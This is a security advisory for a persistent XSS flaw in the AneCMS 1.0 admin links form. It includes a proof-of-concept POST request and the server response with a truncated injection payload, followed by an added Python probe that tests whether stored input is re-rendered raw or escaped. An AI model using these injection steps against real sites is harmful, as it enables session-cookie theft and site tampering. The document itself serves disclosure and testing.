source: https://www.securityfocus.com/bid/38657/info

AneCMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

AneCMS 1.0 is vulnerable; other versions may also be affected.

=======================================================================
ANE CMS 1 Persistent XSS Vulnerability
=======================================================================

by Pratul Agrawal

# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Software ANE CMS 1
# Category CMS / Portals
# Platform php

# Proof of concept

# Targeted URL: http://server/acp/index.php?p=cfg&m=links

In the ADD LINKS field, supply the malicious script so that it is stored in the database. That is:
"> ">
=======================================================================
Request -
=======================================================================

POST /acp/index.php?p=cfg&m=links&id=0 HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://server/acp/index.php?p=cfg&m=links
Cookie: PHPSESSID=200fecb6b36334b983ebe251d11a5df9
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

name=">&link=">&type=1&view=0

=======================================================================

=======================================================================
Response-
=======================================================================

HTTP/1.1 200 OK
Date: Thu, 11 Mar 2010 06:59:03 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset: utf-8
Content-Length: 7771

Transdmin Light

Administration

Configuration » Links


Add a new Link

Bar Links / Menu Links

Name Link Options
Bar Links
Home index.php Modify Delete Move Down
Blog blog Modify Delete Move up Move Down
Register register Modify Delete Move up Move Down
ACP acp Modify Delete Move up Move Down
Widgets index.php?modifywidgets Modify Delete Move up Move Down
master master.asp Modify Delete Move up Move Down
"> "> Modify Delete Move up Move Down
Menu Links
home index.php Modify Delete Move up Move Down
Blog blog Modify Delete Move up Move Down

=======================================================================

After completion, just refresh the page and the script gets executed again and again: the payload is stored in the database and re-rendered into the links table on every load, so it runs for every administrator who views the page.

# If you have any questions, comments, or concerns, feel free to contact me.
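The following Python is an added example, not code from the advisory or from AneCMS. It reproduces the advisory's request encoding for the links form (the page shows only the `">` prefix of the original payload, so a benign probe is used instead of a script), and classifies how a response re-renders the stored value: verbatim (the HTML injection the advisory reports), entity-encoded (the fix, which in PHP is `htmlspecialchars($s, ENT_QUOTES)` at output), or absent. The two row renderers and the probe string are constructed for the example and only model the Name / Link / Options rows seen in the advisory's response.

```python
"""
Stored-XSS probe for the AneCMS "add links" form described in the advisory.

Added example, not code from the advisory or from AneCMS. It assumes the
form fields shown in the advisory's request (name, link, type, view); the
probe string, the helper names and the sample table rows are constructed.
"""
import html
from urllib.parse import urlencode

# Taken from the advisory's request line.
ACP_PATH = "/acp/index.php?p=cfg&m=links&id=0"


def build_link_form(name: str, link: str, type_: int = 1, view: int = 0) -> str:
    """Encode the links form body the way the advisory's POST sends it
    (application/x-www-form-urlencoded, same field order)."""
    return urlencode({"name": name, "link": link, "type": type_, "view": view})


def probe(tag: str) -> str:
    """A benign marker: the same `">` prefix the advisory uses to break out of
    an attribute and its tag, followed by an element that is easy to find in
    the response but executes nothing."""
    return f'"><i id="{tag}">'


def classify_storage(page: str, marker: str) -> str:
    """Tell how the server stored and re-rendered the probe.

    'raw'     - the marker appears verbatim: HTML injection (the advisory's finding).
    'encoded' - the marker appears only with " < > turned into entities: safe output.
    'absent'  - neither form appears (filtered, truncated, or rendered elsewhere).
    """
    if marker in page:
        return "raw"
    if html.escape(marker, quote=True) in page:
        return "encoded"
    return "absent"


# Two renderings of one links-table row (constructed, modelled on the
# Name / Link / Options rows in the advisory's response).
def render_row_vulnerable(name: str, link: str) -> str:
    """Values dropped into markup unencoded: the behaviour the response implies."""
    return (f'<tr><td>{name}</td><td><a href="{link}">{link}</a></td>'
            f'<td>Modify Delete</td></tr>')


def render_row_fixed(name: str, link: str) -> str:
    """Same row with every value passed through html.escape(quote=True), the
    Python equivalent of PHP's htmlspecialchars($s, ENT_QUOTES)."""
    def enc(s: str) -> str:
        return html.escape(s, quote=True)
    return (f'<tr><td>{enc(name)}</td><td><a href="{enc(link)}">{enc(link)}</a></td>'
            f'<td>Modify Delete</td></tr>')


if __name__ == "__main__":
    m = probe("xsscheck")
    print("POST", ACP_PATH)
    print("body:", build_link_form(m, m))
    for label, render in (("vulnerable", render_row_vulnerable), ("fixed", render_row_fixed)):
        page = "<table>" + render(m, m) + "</table>"
        print(f"{label:10s} -> {classify_storage(page, m)}")
```

Against a live target the body from `build_link_form` is sent to `ACP_PATH` with the administrator's session cookie, and `classify_storage` is run over the HTML of a subsequent GET of `/acp/index.php?p=cfg&m=links`; a result of `raw` is the advisory's condition, and the check is repeated on the public pages that render the same link bar, since the advisory only shows the admin view.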